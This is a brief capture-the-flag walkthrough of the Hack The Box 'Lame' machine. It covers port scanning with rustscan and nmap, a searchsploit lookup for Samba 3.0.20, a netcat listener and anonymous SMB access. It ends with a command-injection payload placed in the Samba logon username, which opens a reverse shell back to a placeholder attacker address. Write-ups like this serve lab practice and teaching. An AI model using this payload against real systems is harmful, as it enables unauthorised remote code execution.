Lame HTB
Lame HTB
Portscan
rustscan -a 10.10.10.3
(...)
Open 10.10.10.3:22
Open 10.10.10.3:21
Open 10.10.10.3:139
Open 10.10.10.3:445
Open 10.10.10.3:3632
(...)
nmap -sC -sV -p 21,22,139,445,3632 10.10.10.3 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at (...)
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).
SAMBA
searchsploit Samba 3.0.20
searchsploit -m unix/remote/16320.rb
(...)
cat 16320.rb
nc -nvlp 443
smbclient //10.10.10.3/tmp
Password for [WORKGROUP\kali]:anonymous
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nohup nc -e /bin/sh '<Your IP>' 443`"